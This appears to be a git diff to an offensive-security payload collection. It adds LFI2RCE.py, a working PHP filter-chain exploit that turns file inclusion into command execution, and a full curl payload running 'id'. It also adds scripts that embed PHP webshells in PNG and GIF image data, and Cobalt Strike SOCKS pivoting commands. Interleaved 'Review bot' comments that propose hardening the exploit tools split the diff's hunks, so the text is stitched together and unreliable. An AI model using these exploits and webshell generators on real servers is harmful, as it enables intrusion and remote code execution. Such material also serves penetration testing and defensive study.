diff --git a/File Inclusion/LFI2RCE.py b/File Inclusion/LFI2RCE.py
new file mode 100644
index 0000000..3943715
--- /dev/null
+++ b/File Inclusion/LFI2RCE.py
@@ -0,0 +1,60 @@
+import requests
+
+url = "http://localhost:8000/chall.php"
+file_to_use = "/etc/passwd"
+command = "id"
+
+# 
+base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
+
+conversions = {
+ 'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
+ 'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
+ 'C': 'convert.iconv.UTF8.CSISO2022KR',
+ '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
+ '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
+ 'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
+ 's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
+ 'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
+ 'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
+ 'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
+ 'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
+ '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
+ 'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
+ 'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
+ 'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
+ 'D': 
'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
+ '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
+ '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
+}
+
+
+# generate some garbage base64
+filters = "convert.iconv.UTF8.CSISO2022KR|"
+filters += "convert.base64-encode|"
+# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
+filters += "convert.iconv.UTF8.UTF7|"
+
+
+for c in base64_payload[::-1]:
+ filters += conversions[c] + "|"
+ # decode and reencode to get rid of everything that isn't valid base64
+ filters += "convert.base64-decode|"
+ filters += "convert.base64-encode|"
+ # get rid of equal signs
+ filters += "convert.iconv.UTF8.UTF7|"
+
+filters += "convert.base64-decode"
+
+final_payload = f"php://filter/{filters}/resource={file_to_use}"
+
+with open('payload', 'w') as f:
+ f.write(final_payload)
+
+r = requests.get(url, params={
+ "0": command,
+ "action": "include",
+ "file": final_payload
+})
+
+print(r.text)
\ No newline at end of file
diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index b1a9170..f6bfef4 100644
--- a/File Inclusion/README.md
+++ b/File Inclusion/README.md
@@ -140,7 +140,7 @@ http://example.com/index.php?page=php://filter/convert.base64-encode/resource=in
 http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
 ```
-can be chained with a compression wrapper for large files.
+Wrappers can be chained with a compression wrapper for large files.
 ```powershell
 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
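Review bot: `filters += conversions[c] + "|"` inside `for c in base64_payload[::-1]` indexes the table with no guard, and the table covers exactly the 18 base64 characters that the hard-coded `base64_payload` uses, so anyone who swaps in a different stager (anything containing `=`, `+`, `/` or letters outside the listed set) gets a bare `KeyError` instead of a clear message; add before the loop `missing = set(base64_payload) - conversions.keys()` and `if missing: raise SystemExit(f"no iconv chain for base64 chars: {''.join(sorted(missing))}")`. `requests.get(url, params={...})` has no `timeout=`, and a target that stalls on a chain this long (four or five filters per character, producing a URL of several KB that may also exceed a server's default request-line limit) hangs the script forever, so pass e.g. `timeout=30`. The parameter names `0`, `action` and `file` are specific to the target in `url`; the comment above `base64_payload` (whose PHP snippet appears to have been stripped in this rendering) should say that all three must be retargeted along with `url`. The hunk is a flat script; nothing continues outside it.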
@@ -155,16 +155,28 @@ NOTE: Wrappers can be chained multiple times using `|` or `/`:
 curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php
 ```
+Also there is a way to turn the `php://filter` into a full RCE. Use [LFI2RCE.py](./LFI2RCE.py) to generate a custom payload.
+
+```powershell
+# vulnerable file: index.php
+# vulnerable parameter: file
+# executed command: id
+# executed PHP code: 
+curl "127.0.0.1:8000/index.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert
.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|
convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd"
+```
+
+
 ### Wrapper zip://
-```python
-echo "
" > payload.php;
-zip payload.zip payload.php;
-mv payload.zip shell.jpg;
-rm payload.php
+1. Create an evil payload: `echo "
" > payload.php;`
+2. Zip the file
+ ```python
+ zip payload.zip payload.php;
+ mv payload.zip shell.jpg;
+ rm payload.php
+ ```
+3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php
-http://example.com/index.php?page=zip://shell.jpg%23payload.php
-```
 ### Wrapper data://
@@ -175,6 +187,7 @@ NOTE: the payload is ""
 Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
+
 ### Wrapper expect://
 ```powershell
@@ -182,6 +195,7 @@ http://example.com/index.php?page=expect://id
 http://example.com/index.php?page=expect://ls
 ```
+
 ### Wrapper input://
 Specify your payload in the POST parameters, this can be done with a simple `curl` command.
@@ -196,6 +210,7 @@ Alternatively, Kadimus has a module to automate this attack.
 ./kadimus -u "https://example.com/index.php?page=php://input%00" -C '' -T input
 ```
+
 ### Wrapper phar://
 Create a phar file with a serialized object in its meta-data.
@@ -229,6 +244,7 @@ include('phar://test.phar');
 NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more.
+
 ## LFI to RCE via /proc/*/fd
 1. Upload a lot of shells (for example : 100)
@@ -243,6 +259,7 @@ GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
 User-Agent: 
 ```
+
 ## LFI to RCE via upload
 If you can upload a file, just inject the shell payload in it (e.g : `` ).
@@ -253,6 +270,7 @@ http://example.com/index.php?page=path/to/uploaded/file.png
 In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf
+
 ## LFI to RCE via upload (race)
 Worlds Quitest Let's Play"
 * Upload a file and trigger a self-inclusion.
@@ -456,3 +474,5 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
 * [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
 * [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
 * [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376)
+* [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
+* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md
index affccdb..e84435c 100644
--- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md
+++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md
@@ -337,6 +337,11 @@ Opsec safe Pass-the-Hash:
 ```powershell
 # Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.
 beacon > socks [PORT]
+beacon > socks [port]
+beacon > socks [port] [socks4]
+beacon > socks [port] [socks5]
+beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password]
+beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging]
 # Proxy browser traffic through a specified Internet Explorer process.
 beacon > browserpivot [pid] [x86|x64]
diff --git a/Upload Insecure Files/Picture Resize/GIF_exploit.gif b/Upload Insecure Files/Picture Compression/GIF_exploit.gif
similarity index 100%
rename from Upload Insecure Files/Picture Resize/GIF_exploit.gif
rename to Upload Insecure Files/Picture Compression/GIF_exploit.gif
diff --git a/Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg b/Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg
similarity index 100%
rename from Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg
rename to Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg
diff --git a/Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png b/Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png
similarity index 100%
rename from Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png
rename to Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png
diff --git a/Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png b/Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png
similarity index 100%
rename from Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png
rename to Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png
diff --git a/Upload Insecure Files/Picture Resize/exploit_JPG.py b/Upload Insecure Files/Picture Compression/createBulletproofJPG.py
similarity index 97%
rename from Upload Insecure Files/Picture Resize/exploit_JPG.py
rename to Upload Insecure Files/Picture Compression/createBulletproofJPG.py
index 14b8a09..c3e2bbb 100644
--- a/Upload Insecure Files/Picture Resize/exploit_JPG.py
+++ b/Upload Insecure Files/Picture Compression/createBulletproofJPG.py
@@ -1,7 +1,6 @@
 #!/usr/bin/python
 """
-
 Bulletproof Jpegs Generator
 Copyright (C) 2012 Damien "virtualabs" Cauquil
@@ -18,7 +17,11 @@ You should have received a copy of the GNU General Public License
 along with this program; if not, write to the Free Software
 Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
-
+
+ -------------
+ # How to use
+ b.php?c=ls
+ Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
 """
 from __future__ import print_function
diff --git a/Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php b/Upload Insecure Files/Picture Compression/createCompressedPNG_110x110.php
similarity index 100%
rename from Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php
rename to Upload Insecure Files/Picture Compression/createCompressedPNG_110x110.php
diff --git a/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php b/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php
new file mode 100644
index 0000000..d505461
--- /dev/null
+++ b/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php
@@ -0,0 +1,22 @@
+";
+$_width=200;
+$_height=200;
+if(strlen($_payload)%3!=0){
+ echo "payload%3==0 !"; exit();
+}
+$im = imagecreate($_width, $_height);
+$_hex=unpack('H*',$_payload);
+
+$colors_hex=str_split($_hex[1], 6);
+
+for($i=0; $i < count($colors_hex); $i++){
+ $_color_chunks=str_split($colors_hex[$i], 2);
+ $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
+ imagesetpixel($im,$i,1,$color);
+}
+
+imagegif($im,$_file);
+?>
\ No newline at end of file
diff --git a/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php b/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php
new file mode 100644
index 0000000..d5abcb7
--- /dev/null
+++ b/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php
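Review bot: The only input check in createGIFwithGlobalColorTable.php is `if(strlen($_payload)%3!=0)`, but each 3-byte chunk becomes one `imagecolorallocate()` entry and a palette image from `imagecreate()` holds at most 256 colours, so a payload over 768 bytes makes `imagecolorallocate()` return `false` and the remaining chunks silently never reach the global colour table; add `if(strlen($_payload)>768){ echo "payload too long: max 768 bytes (256 palette entries)"; exit(); }` beside the existing check and abort in the loop when `$color===false`. The message `echo "payload%3==0 !"` reads as a condition rather than an error; `"payload length must be a multiple of 3"` says what went wrong. `$_width=200` does not bound the payload either, because `imagesetpixel($im,$i,1,$color)` is simply ignored for `$i>=200` while the bytes still travel in the palette, which is harmless but deserves a one-line comment so the fixed width is not mistaken for a limit. The hunk's opening lines, presumably `<?php` and the `$_file`/`$_payload` assignments, appear stripped in this rendering, so the `$_file` passed to `imagegif($im,$_file)` cannot be checked here.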
@@ -0,0 +1,28 @@
+ ";
+$_pay_len=strlen($_payload);
+if(strlen($_payload)%3!=0){
+ echo "payload%3==0 !"; exit();
+}
+
+
+$width=$_pay_len/3;
+$height=20;
+//$im = imageCreateFromPng("existing.png");
+$im = imagecreate($width, $height);
+
+$_hex=unpack('H*',$_payload);
+$_chunks=str_split($_hex[1], 6);
+
+for($i=0; $i < count($_chunks); $i++){
+
+ $_color_chunks=str_split($_chunks[$i], 2);
+ $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
+
+ imagesetpixel($im,$i,1,$color);
+
+}
+
+imagepng($im,"example.png");
\ No newline at end of file
diff --git a/Upload Insecure Files/Picture Resize/README.txt b/Upload Insecure Files/Picture Resize/README.txt
deleted file mode 100644
index 633f383..0000000
--- a/Upload Insecure Files/Picture Resize/README.txt
+++ /dev/null
@@ -1,5 +0,0 @@
-# How to use
-b.php?c=ls
-
-
-Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
\ No newline at end of file
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index 3f5bfba..585939a 100644
--- a/Upload Insecure Files/README.md
+++ b/Upload Insecure Files/README.md
@@ -9,7 +9,7 @@
 * [Defaults extensions](#defaults-extensions)
 * [Upload tricks](#upload-tricks)
 * [Filename vulnerabilities](#filename-vulnerabilities)
- * [Picture upload with LFI](#picture-upload-with-lfi)
+ * [Picture compression](#picture-compression-)
 * [Configuration Files](#configuration-files)
 * [CVE - Image Tragik](#cve---image-tragik)
 * [CVE - FFMpeg](#cve---ffmpeg)
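Review bot: In createPNGwithPLTE.php `$width=$_pay_len/3` grows with the payload, but the PLTE of the palette image made by `imagecreate()` holds at most 256 entries, so after 768 payload bytes `imagecolorallocate()` returns `false` and the excess chunks are dropped with no error; add `if($_pay_len>768){ echo "payload too long: max 768 bytes (256 PLTE entries)"; exit(); }` after the `%3` check and stop the loop when `$color===false`. The output name is hard-coded in `imagepng($im,"example.png")` while the sibling GIF generator writes to a `$_file` variable; using the same variable keeps the two tools consistent and makes the destination visible at the top of the file. The commented-out `//$im = imageCreateFromPng("existing.png");` is dead code and should be removed or turned into a real option. The hunk's opening lines, presumably `<?php` and the `$_payload` assignment, appear stripped in this rendering, so the payload definition itself cannot be reviewed here.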
@@ -107,12 +107,16 @@ Also you upload:
 - HTML/SVG files to trigger an XSS
 - EICAR file to check the presence of an antivirus
-### Picture upload with LFI
+### Picture Compression
-Valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
+Create valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`.
 - Picture Metadata, hide the payload inside a comment tag in the metadata.
 - Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`.
+ - [JPG](https://virtualabs.fr/Nasty-bulletproof-Jpegs-l): use createBulletproofJPG.py
+ - [PNG](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createPNGwithPLTE.php
+ - [GIF](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createGIFwithGlobalColorTable.php
+
 ### Picture with custom metadata
@@ -198,4 +202,5 @@ Upload the XML file to `$JETTY_BASE/webapps/`
 * [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
 * [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
 * [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
-* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
\ No newline at end of file
+* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
+* [Injection points in popular image formats - Daniel Kalinowski‌‌ - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/)
\ No newline at end of file